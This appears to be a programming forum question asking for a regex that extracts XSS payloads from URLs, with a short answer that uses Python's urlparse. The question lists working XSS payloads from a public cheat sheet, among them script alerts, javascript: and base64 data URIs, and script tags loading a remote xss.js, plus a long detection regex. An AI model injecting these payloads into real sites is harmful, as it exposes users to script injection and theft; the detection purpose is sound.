2017-09-26 | 8 views | 1 vote

Regex that matches all XSS payloads in the following list

I need a regex that matches all of the XSS payloads in the following list (I am not trying to filter XSS requests or to store only safe URLs; I want to take the payload out of the URL itself and store it in a variable for later use). I found one and managed to edit it so that it matches some of them (the regex is below the list):

http://www.example.com/subcat.php?id=24\x3c 
http://www.example.com/subcat.php?id=24\x3C 
http://www.example.com/subcat.php?id=24\u003c 
http://www.example.com/subcat.php?id=24\u003C 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24%3C 
http://www.example.com/subcat.php?id=24&lt 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24&LT 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24&#60 
http://www.example.com/subcat.php?id=24&#060 
http://www.example.com/subcat.php?id=24&#0060 
http://www.example.com/subcat.php?id=24&#00060 
http://www.example.com/subcat.php?id=24&#000060 
http://www.example.com/subcat.php?id=24&#0000060 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24&#x3c 
http://www.example.com/subcat.php?id=24&#x03c 
http://www.example.com/subcat.php?id=24&#x003c 
http://www.example.com/subcat.php?id=24&#x0003c 
http://www.example.com/subcat.php?id=24&#x00003c 
http://www.example.com/subcat.php?id=24&#x000003c 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24&#X3c 
http://www.example.com/subcat.php?id=24&#X03c 
http://www.example.com/subcat.php?id=24&#X003c 
http://www.example.com/subcat.php?id=24&#X0003c 
http://www.example.com/subcat.php?id=24&#X00003c 
http://www.example.com/subcat.php?id=24&#X000003c 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24&#x3C 
http://www.example.com/subcat.php?id=24&#x03C 
http://www.example.com/subcat.php?id=24&#x003C 
http://www.example.com/subcat.php?id=24&#x0003C 
http://www.example.com/subcat.php?id=24&#x00003C 
http://www.example.com/subcat.php?id=24&#x000003C 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24&#X3C 
http://www.example.com/subcat.php?id=24&#X03C 
http://www.example.com/subcat.php?id=24&#X003C 
http://www.example.com/subcat.php?id=24&#X0003C 
http://www.example.com/subcat.php?id=24&#X00003C 
http://www.example.com/subcat.php?id=24&#X000003C 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24< 
http://www.example.com/subcat.php?id=24<script>alert(123)</script> 
http://www.example.com/subcat.php?id=24<script>alert("hellox worldss");</script> 
http://www.example.com/subcat.php?id=24javascript:alert("hellox worldss") 
http://www.example.com/subcat.php?id=24<img src="javascript:alert('XSS');"> 
http://www.example.com/subcat.php?id=24<img src=javascript:alert(&quot;XSS&quot;)> 
http://www.example.com/subcat.php?id=24<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> 
http://www.example.com/subcat.php?id=24<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> 
http://www.example.com/subcat.php?id=24<IFRAME SRC="javascript:alert('XSS');"></IFRAME> 
http://www.example.com/subcat.php?id=24<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> 
http://www.example.com/subcat.php?id=24<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> 
http://www.example.com/subcat.php?id=24<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> 
http://www.example.com/subcat.php?id=24<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> 
http://www.example.com/subcat.php?id=24<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> 
http://www.example.com/subcat.php?id=24<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> 
http://www.example.com/subcat.php?id=24<<SCRIPT>alert("XSS");//<</SCRIPT> 
.... (for all see the URL) 

The regex I found and edited matches some of these, but not all of them:

<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*(?:\W*s\W*c\W*r\W*i\W*p\W*t|\W*f\W*o\W*r\W*m|\W*s\W*t\W*y\W*l\W*e|\W*s\W*v\W*g|\W*m\W*a\W*r\W*q\W*u\W*e\W*e|(?:\W*l\W*i\W*n\W*k|\W*o\W*b\W*j\W*e\W*c\W*t|\W*e\W*m\W*b\W*e\W*d|\W*a\W*p\W*p\W*l\W*e\W*t|\W*p\W*a\W*r\W*a\W*m|\W*i?\W*f\W*r\W*a\W*m\W*e|\W*b\W*a\W*s\W*e|\W*b\W*o\W*d\W*y|\W*m\W*e\W*t\W*a|\W*i\W*m\W*a?\W*g\W*e?|\W*v\W*i\W*d\W*e\W*o|\W*a\W*u\W*d\W*i\W*o|\W*b\W*i\W*n\W*d\W*i\W*n\W*g\W*s|\W*s\W*e\W*t|\W*i\W*s\W*i\W*n\W*d\W*e\W*x|\W*a\W*n\W*i\W*m\W*a\W*t\W*e)[^>\w])|(?:<\w[\s\S]*[\s\0\/]|['\"])(?:formaction|style|background|src|lowsrc|ping|on(?:d(?:e(?:vice(?:(?:orienta|mo)tion|proximity|found|light)|livery(?:success|error)|activate)|r(?:ag(?:e(?:n(?:ter|d)|xit)|(?:gestur|leav)e|start|drop|over)?|op)|i(?:s(?:c(?:hargingtimechange|onnect(?:ing|ed))|abled)|aling)|ata(?:setc(?:omplete|hanged)|(?:availabl|chang)e|error)|urationchange|ownloading|blclick)|Moz(?:M(?:agnifyGesture(?:Update|Start)?|ouse(?:PixelScroll|Hittest))|S(?:wipeGesture(?:Update|Start|End)?|crolledAreaChanged)|(?:(?:Press)?TapGestur|BeforeResiz)e|EdgeUI(?:C(?:omplet|ancel)|Start)ed|RotateGesture(?:Update|Start)?|A(?:udioAvailable|fterPaint))|c(?:o(?:m(?:p(?:osition(?:update|start|end)|lete)|mand(?:update)?)|n(?:t(?:rolselect|extmenu)|nect(?:ing|ed))|py)|a(?:(?:llschang|ch)ed|nplay(?:through)?|rdstatechange)|h(?:(?:arging(?:time)?ch)?ange|ecking)|(?:fstate|ell)change|u(?:echange|t)|l(?:ick|ose))|m(?:o(?:z(?:pointerlock(?:change|error)|(?:orientation|time)change|fullscreen(?:change|error)|network(?:down|up)load)|use(?:(?:lea|mo)ve|o(?:ver|ut)|enter|wheel|down|up)|ve(?:start|end)?)|essage|ark)|s(?:t(?:a(?:t(?:uschanged|echange)|lled|rt)|k(?:sessione|comma)nd|op)|e(?:ek(?:complete|ing|ed)|(?:lec(?:tstar)?)?t|n(?:ding|t))|u(?:ccess|spend|bmit)|peech(?:start|end)|ound(?:start|end)|croll|how)|b(?:e(?:for(?:e(?:(?:scriptexecu|activa)te|u(?:nload|pdate)|p(?:aste|rint)|c(?:opy|ut)|editfocus)|deactivate)|gin(?:Event)?)|oun(?:dary|ce)|l(?:ocked|ur)|roadcast|usy)|a(?:n(?:imation(?:iteration|start|end)|tennastatechange)|fter(?:(?:scriptexecu|upda)te|print)|udio(?:process|start|end)|d(?:apteradded|dtrack)|ctivate|lerting|bort)|DOM(?:Node(?:Inserted(?:IntoDocument)?|Removed(?:FromDocument)?)|(?:CharacterData|Subtree)Modified|A(?:ttrModified|ctivate)|Focus(?:Out|In)|MouseScroll)|r(?:e(?:s(?:u(?:m(?:ing|e)|lt)|ize|et)|adystatechange|pea(?:tEven)?t|movetrack|trieving|ceived)|ow(?:s(?:inserted|delete)|e(?:nter|xit))|atechange)|p(?:op(?:up(?:hid(?:den|ing)|show(?:ing|n))|state)|a(?:ge(?:hide|show)|(?:st|us)e|int)|ro(?:pertychange|gress)|lay(?:ing)?)|t(?:ouch(?:(?:lea|mo)ve|en(?:ter|d)|cancel|start)|ime(?:update|out)|ransitionend|ext)|u(?:s(?:erproximity|sdreceived)|p(?:gradeneeded|dateready)|n(?:derflow|load))|f(?:o(?:rm(?:change|input)|cus(?:out|in)?)|i(?:lterchange|nish)|ailed)|l(?:o(?:ad(?:e(?:d(?:meta)?data|nd)|start)?|secapture)|evelchange|y)|g(?:amepad(?:(?:dis)?connected|button(?:down|up)|axismove)|et)|e(?:n(?:d(?:Event|ed)?|abled|ter)|rror(?:update)?|mptied|xit)|i(?:cc(?:cardlockerror|infochange)|n(?:coming|valid|put))|o(?:(?:(?:ff|n)lin|bsolet)e|verflow(?:changed)?|pen)|SVG(?:(?:Unl|L)oad|Resize|Scroll|Abort|Error|Zoom)|h(?:e(?:adphoneschange|l[dp])|ashchange|olding)|v(?:o(?:lum|ic)e|ersion)change|w(?:a(?:it|rn)ing|heel)|key(?:press|down|up)|(?:AppComman|Loa)d|no(?:update|match)|Request|zoom))[\s\0]*=

For example, see here: it matches <script> and some of the others, but it will not give a full match on all of them. Does anyone have a better regex that matches XSS payloads in URLs, or a better way of finding XSS payloads? Thanks in advance.

+0

Possible duplicate of [Python library for XSS filtering?](https://stackoverflow.com/questions/901369/python-library-for-xss-filtering) – ctwheels

+1

@ctwheels Thanks! – wahwahwah

+0

@ctwheels Hi, and thank you, but that does not answer my question. I am not trying to filter XSS; I am trying to take the payload out of the URL and store it in a variable. – wahwahwah

Answer

0

Figured out how to do it simply with a built-in library:

    import urlparse  # Python 2 module name; on Python 3 use: from urllib import parse as urlparse

    def find_xss_script(url, query=4):
        # urlparse() returns a 6-tuple (scheme, netloc, path, params, query, fragment);
        # index 4 is the raw query string, which is where the payload ends up
        data = urlparse.urlparse(url)
        return data[query]

It returns something like id=24&#x000003c;